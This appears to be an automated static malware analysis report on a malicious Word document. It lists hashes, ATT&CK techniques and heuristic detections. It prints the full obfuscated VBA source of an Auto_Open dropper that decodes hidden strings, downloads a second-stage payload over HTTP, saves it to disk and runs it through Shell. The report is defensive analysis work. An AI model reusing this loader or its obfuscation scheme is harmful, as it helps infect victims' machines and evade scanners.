Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 2ac00f1b7ff843ec…

MALICIOUS

Office (OOXML)

20.5 KB Created: 2021-11-05 12:41:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2021-11-21
MD5: 8aceb6afc1eedff3dc2f60604e271651 SHA-1: b31ad21ce3d008cbd1afc5bbe5c11c5051f1803e SHA-256: 2ac00f1b7ff843ecc8493c57f035088a1d2e669e64232434d4a9c7eb59d088e3
292 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample contains a VBA macro with an Auto_Open function that uses CreateObject to instantiate objects for downloading and saving a file. The script attempts to download a second-stage payload from a URL constructed through string concatenation and save it to disk, likely for execution. This indicates a downloader or droppper functionality.

Heuristics 9

  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell (eIQgbFvxyDfZIa(Array((4 + 75), (140 Xor 126), (66 + 41), ((27 Xor 140) + 64), (28 Xor 39), ((141 Xor 74) + (50 Xor 6)), (35 Xor 95), (0 Xor 69), (5 Xor 15), (27 + 70), (3 + (27 Xor 88)), (12 Xor 209), 114, (6 Xor 23), ((3 Xor 5) + (11 Xor 200)), ((8 Xor 0) + 4), (72 Xor 191), ((12 Xor 29) + 95), 122, ((151 Xor 84) + 10), (7 Xor 13), (28 + (26 Xor 32)), ((156 Xor 41) + 35), 59, (16 + 24), (37 Xor 95), (53 + 100)), 99) & eIQgbFvxyDfZIa(Array(((18 Xor 12) + (97 Xor 242)), (175 Xor 64), (96 X …
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    .write xfXUInNOTKDYZ.responseBody
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Dim xfXUInNOTKDYZ: Set xfXUInNOTKDYZ = CreateObject(eIQgbFvxyDfZIa(Array(181, (46 Xor 154), (119 Xor 250)), 0) & eIQgbFvxyDfZIa(Array(((34 Xor 114) + 115), ((3 Xor 140) + (84 Xor 62)), 71, 148, 155, 192, 7, (26 Xor 40), 243, ((35 Xor 131) + (4 Xor 65)), (84 + (15 Xor 42)), (158 Xor 71), (37 + (28 Xor 73)), 77), (0 Xor 3)))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Dim xfXUInNOTKDYZ: Set xfXUInNOTKDYZ = CreateObject(eIQgbFvxyDfZIa(Array(181, (46 Xor 154), (119 Xor 250)), 0) & eIQgbFvxyDfZIa(Array(((34 Xor 114) + 115), ((3 Xor 140) + (84 Xor 62)), 71, 148, 155, 192, 7, (26 Xor 40), 243, ((35 Xor 131) + (4 Xor 65)), (84 + (15 Xor 42)), (158 Xor 71), (37 + (28 Xor 73)), 77), (0 Xor 3)))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/markup-compatibility/2006 Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 8059 bytes
SHA-256: b30a599d9e1767eaf3e1a46a6c01bc27a7d0ac7b048b6c41df9a29c298527282
Detection
ClamAV: No threats found
Obfuscation or payload: likely
34 of 63 identifiers look randomly generated (e.g. 'AjesQypscJuacS') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private uMWtxlWBycGNXo       As Boolean
Private OzxgkGbxvLQx(0 To 63)  As Byte
Private AgxFTInEUAmFla((0 Xor 0) To (105 Xor 22)) As Byte
Sub Auto_Open()
Dim xfXUInNOTKDYZ: Set xfXUInNOTKDYZ = CreateObject(eIQgbFvxyDfZIa(Array(181, (46 Xor 154), (119 Xor 250)), 0) & eIQgbFvxyDfZIa(Array(((34 Xor 114) + 115), ((3 Xor 140) + (84 Xor 62)), 71, 148, 155, 192, 7, (26 Xor 40), 243, ((35 Xor 131) + (4 Xor 65)), (84 + (15 Xor 42)), (158 Xor 71), (37 + (28 Xor 73)), 77), (0 Xor 3)))
Dim RNQKUlkWcflQvU: Set RNQKUlkWcflQvU = CreateObject(eIQgbFvxyDfZIa(Array(((39 Xor 100) + 71), ((3 Xor 9) + (205 Xor 2)), (35 + 75), 13, ((4 Xor 21) + 5), 141, (99 Xor 177), ((61 Xor 3) + 56), (56 Xor 181)), ((0 Xor 6) + 11)) & eIQgbFvxyDfZIa(Array(187, 24, (47 + (17 Xor 115))), ((0 Xor 3) + (22 Xor 1))))
xfXUInNOTKDYZ.Open eIQgbFvxyDfZIa(Array((187 + 66), 218, 58), 29), eIQgbFvxyDfZIa(Array((149 Xor 105), (5 Xor 67), (28 + 216), 71, ((149 Xor 86) + 38), ((70 Xor 15) + (24 Xor 62))), (16 Xor 48)) & eIQgbFvxyDfZIa(Array((16 Xor 60), (3 Xor 235), 10, (33 Xor 99), (30 Xor 114), 144, 106, (3 Xor 4), (70 Xor 138), (0 + (8 Xor 1)), ((11 Xor 6) + (75 Xor 31)), (52 + (105 Xor 243)), (7 Xor 201), ((86 Xor 252) + (1 Xor 21)), (55 + 142), (125 Xor 228), 45, (56 + 167), (27 Xor 48), 114, 140, 96, 212, (39 + 7), ((0 Xor 10) + 13), 199, ((1 Xor 0) + 1), (39 Xor 120), _
(2 + (58 Xor 164))), ((2 Xor 9) + 27)), False
xfXUInNOTKDYZ.Send
With RNQKUlkWcflQvU
.Type = 1
.Open
.write xfXUInNOTKDYZ.responseBody
.savetofile eIQgbFvxyDfZIa(Array(((30 Xor 89) + 142), (29 + (38 Xor 142)), (31 + (81 Xor 56)), (39 + 1), (57 + (41 Xor 92)), (105 + 142), (23 Xor 11), (100 Xor 138), 209, ((21 Xor 10) + 4), (14 Xor 125), ((14 Xor 16) + (22 Xor 172))), 67) & eIQgbFvxyDfZIa(Array((16 + (2 Xor 0)), (43 + (20 Xor 92)), 14, 242, (166 Xor 119), 106, (16 + (0 Xor 2)), 78, 92, (9 + 13), (34 Xor 119), (14 + (10 Xor 88)), 95, ((6 Xor 23) + 30), (72 + 54), 240, ((0 Xor 30) + (33 Xor 116)), 250, (72 + 37), (87 + 136)), 79), ((1 Xor 3) + 0)
End With
Shell (eIQgbFvxyDfZIa(Array((4 + 75), (140 Xor 126), (66 + 41), ((27 Xor 140) + 64), (28 Xor 39), ((141 Xor 74) + (50 Xor 6)), (35 Xor 95), (0 Xor 69), (5 Xor 15), (27 + 70), (3 + (27 Xor 88)), (12 Xor 209), 114, (6 Xor 23), ((3 Xor 5) + (11 Xor 200)), ((8 Xor 0) + 4), (72 Xor 191), ((12 Xor 29) + 95), 122, ((151 Xor 84) + 10), (7 Xor 13), (28 + (26 Xor 32)), ((156 Xor 41) + 35), 59, (16 + 24), (37 Xor 95), (53 + 100)), 99) & eIQgbFvxyDfZIa(Array(((18 Xor 12) + (97 Xor 242)), (175 Xor 64), (96 Xor 9), (122 Xor 206), ((29 Xor 43) + (10 Xor 150)), _
(93 Xor 44), (131 + (45 Xor 120)), (1 Xor 0), (2 + (0 Xor 2)), ((0 Xor 56) + (10 Xor 78)), (6 + 216), ((16 Xor 101) + (13 Xor 29)), (86 Xor 38), 38, 161, 24, (21 + (35 Xor 119)), ((10 Xor 32) + (94 Xor 155)), 34, (2 + (46 Xor 139)), (158 + (27 Xor 81)), (3 Xor 7), 32, ((6 Xor 35) + (47 Xor 92)), 185, (1 + 2), (25 Xor 186), ((7 Xor 13) + (180 Xor 109)), (34 + (3 Xor 11)), ((36 Xor 162) + (11 Xor 75)), (4 Xor 3), (100 Xor 229), (10 Xor 25), 249, ((21 Xor 78) + (48 Xor 93)), (89 Xor 205), (6 + 16), (15 Xor 28), (10 + 71), (99 Xor 232)), ((100 Xor 3) + (10 Xor 29))))
End Sub
Public Function IcmALVfXRueIf(ByVal DpGmbsecmCqV As String) As Byte()
If Not uMWtxlWBycGNXo Then COqqitRgRInz
Dim pyXmshRggT() As Byte: pyXmshRggT = aTgfjbDnaaql(DpGmbsecmCqV)
Dim OTtOprwMWjBR As Long: OTtOprwMWjBR = UBound(pyXmshRggT) + (1 + 0)
If OTtOprwMWjBR Mod 4 <> ((0 Xor 0) + (0 Xor 0)) Then Err.Raise vbObjectError, , ""
Do While OTtOprwMWjBR > ((0 Xor 0) + 0)
If pyXmshRggT(OTtOprwMWjBR - (0 Xor 1)) <> Asc("=") Then Exit Do
OTtOprwMWjBR = OTtOprwMWjBR - ((1 Xor 0) + 0)
Loop
Dim WLoTTiZXJjbB As Long: WLoTTiZXJjbB = (OTtOprwMWjBR * ((2 Xor 1) + (0 Xor 0))) \ 4
Dim vtuNtKJsjfvF() As Byte
ReDim vtuNtKJsjfvF(0 To WLoTTiZXJjbB - ((1 Xor 0) + 0)) As Byte
Dim RGNGemfZFoS As Long
Dim ZIvgOlBJPQiuC As Long
Do While RGNGemfZFoS < OTtOprwMWjBR
Dim kCMSreDqugPQet As Byte: kCMSreDqugPQet = pyXmshRggT(RGNGemfZFoS): RGNGemfZFoS = RGNGemfZFoS + 1
Dim RONoLBwgfDCXA As Byte: RONoLBwgfDCXA = pyXmshRggT(RGNGemfZFoS): RGNGemfZFoS = RGNGemfZFoS + 1
Dim tpuVPhRJlM As Byte: If RGNGemfZFoS < OTtOprwMWjBR Then tpuVPhRJlM = pyXmshRggT(RGNGemfZFoS): RGNGemfZFoS = RGNGemfZFoS + (1 + 0) Else tpuVPhRJlM = Asc("A")
Dim WdQMIofXMTH As Byte: If RGNGemfZFoS < OTtOprwMWjBR Then WdQMIofXMTH = pyXmshRggT(RGNGemfZFoS): RGNGemfZFoS = RGNGemfZFoS + (1 Xor 0) Else WdQMIofXMTH = Asc("A")
If kCMSreDqugPQet > (39 Xor 88) Or RONoLBwgfDCXA > (116 + (1 Xor 10)) Or tpuVPhRJlM > 127 Or WdQMIofXMTH > 127 Then _
Err.Raise vbObjectError, , ""
Dim KztlamNUzN As Byte: KztlamNUzN = AgxFTInEUAmFla(kCMSreDqugPQet)
Dim dkdpZlwVcI As Byte: dkdpZlwVcI = AgxFTInEUAmFla(RONoLBwgfDCXA)
Dim nDplkDFxBlvNy As Byte: nDplkDFxBlvNy = AgxFTInEUAmFla(tpuVPhRJlM)
Dim AjesQypscJuacS As Byte: AjesQypscJuacS = AgxFTInEUAmFla(WdQMIofXMTH)
If KztlamNUzN > (50 Xor 13) Or dkdpZlwVcI > ((9 Xor 32) + 22) Or nDplkDFxBlvNy > (7 + (35 Xor 27)) Or AjesQypscJuacS > (34 Xor 29) Then _
Err.Raise vbObjectError, , ""
Dim gUHHQqGupZjEY As Byte: gUHHQqGupZjEY = (KztlamNUzN * (4 Xor 0)) Or (dkdpZlwVcI \ &H10)
Dim IcFGwJeFkEYDz As Byte: IcFGwJeFkEYDz = ((dkdpZlwVcI And &HF) * &H10) Or (nDplkDFxBlvNy \ ((1 Xor 0) + (2 Xor 1)))
Dim mBJlqHfIivjei As Byte: mBJlqHfIivjei = ((nDplkDFxBlvNy And (0 + (0 Xor 3))) * &H40) Or AjesQypscJuacS
vtuNtKJsjfvF(ZIvgOlBJPQiuC) = gUHHQqGupZjEY: ZIvgOlBJPQiuC = ZIvgOlBJPQiuC + 1
If ZIvgOlBJPQiuC < WLoTTiZXJjbB Then vtuNtKJsjfvF(ZIvgOlBJPQiuC) = IcFGwJeFkEYDz: ZIvgOlBJPQiuC = ZIvgOlBJPQiuC + 1
If ZIvgOlBJPQiuC < WLoTTiZXJjbB Then vtuNtKJsjfvF(ZIvgOlBJPQiuC) = mBJlqHfIivjei: ZIvgOlBJPQiuC = ZIvgOlBJPQiuC + 1
Loop
IcmALVfXRueIf = vtuNtKJsjfvF
End Function
Private Sub COqqitRgRInz()
Dim bhwZmPvUchx As Integer, hmulLjFfVTL As Integer
hmulLjFfVTL = 0
For bhwZmPvUchx = Asc("A") To Asc("Z"): OzxgkGbxvLQx(hmulLjFfVTL) = bhwZmPvUchx: hmulLjFfVTL = hmulLjFfVTL + ((1 Xor 0) + (0 Xor 0)): Next
For bhwZmPvUchx = Asc("a") To Asc("z"): OzxgkGbxvLQx(hmulLjFfVTL) = bhwZmPvUchx: hmulLjFfVTL = hmulLjFfVTL + (0 Xor 1): Next
For bhwZmPvUchx = Asc("0") To Asc("9"): OzxgkGbxvLQx(hmulLjFfVTL) = bhwZmPvUchx: hmulLjFfVTL = hmulLjFfVTL + (0 + 1): Next
OzxgkGbxvLQx(hmulLjFfVTL) = Asc("+"): hmulLjFfVTL = hmulLjFfVTL + (1 + 0)
OzxgkGbxvLQx(hmulLjFfVTL) = Asc("/"): hmulLjFfVTL = hmulLjFfVTL + 1
For hmulLjFfVTL = (0 + 0) To ((63 Xor 84) + 20): AgxFTInEUAmFla(hmulLjFfVTL) = 255: Next
For hmulLjFfVTL = 0 To (56 + 7): AgxFTInEUAmFla(OzxgkGbxvLQx(hmulLjFfVTL)) = hmulLjFfVTL: Next
uMWtxlWBycGNXo = True
End Sub
Private Function aTgfjbDnaaql(ByVal DpGmbsecmCqV As String) As Byte()
Dim dkdpZlwVcI() As Byte: dkdpZlwVcI = DpGmbsecmCqV
Dim mkniCDPsJkV As Long: mkniCDPsJkV = (UBound(dkdpZlwVcI) + (1 + (0 Xor 0))) \ ((2 Xor 0) + 0)
If mkniCDPsJkV = 0 Then aTgfjbDnaaql = dkdpZlwVcI: Exit Function
Dim nDplkDFxBlvNy() As Byte
ReDim nDplkDFxBlvNy((0 Xor 0) To mkniCDPsJkV - 1) As Byte
Dim DUQyelPqGIzypz As Long
For DUQyelPqGIzypz = (0 Xor 0) To mkniCDPsJkV - (1 + 0)
Dim bhwZmPvUchx As Long: bhwZmPvUchx = dkdpZlwVcI(2 * DUQyelPqGIzypz) + (87 + (93 Xor 244)) * CLng(dkdpZlwVcI(2 * DUQyelPqGIzypz + 1))
If bhwZmPvUchx >= 256 Then bhwZmPvUchx = Asc("?")
nDplkDFxBlvNy(DUQyelPqGIzypz) = bhwZmPvUchx
Next
aTgfjbDnaaql = nDplkDFxBlvNy
End Function
Private Function eIQgbFvxyDfZIa(cxknVmYSLrB As Variant, VXJwVypQzz As Integer)
Dim PwdRsyBnnEFR As String
Dim WQAuXOcmKXZ() As Byte
WQAuXOcmKXZ = IcmALVfXRueIf(ActiveDocument.Variables("XRICEIzuoraJhzas"))
PwdRsyBnnEFR = ""
For hmulLjFfVTL = LBound(cxknVmYSLrB) To UBound(cxknVmYSLrB)
PwdRsyBnnEFR = PwdRsyBnnEFR & Chr(WQAuXOcmKXZ(hmulLjFfVTL + VXJwVypQzz) Xor cxknVmYSLrB(hmulLjFfVTL))
Next
eIQgbFvxyDfZIa = PwdRsyBnnEFR
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 20480 bytes
SHA-256: 2a9725521de20f962818604c08527db153fb4e23c4ef8dffaf1fce1812643dd2
Detection
ClamAV: No threats found
Obfuscation or payload: likely
84 of 152 identifiers look randomly generated (e.g. 'kCMSreDqugPQet') — consistent with name-mangling obfuscation.

Open this report in the interactive analyzer, or submit your own file for analysis.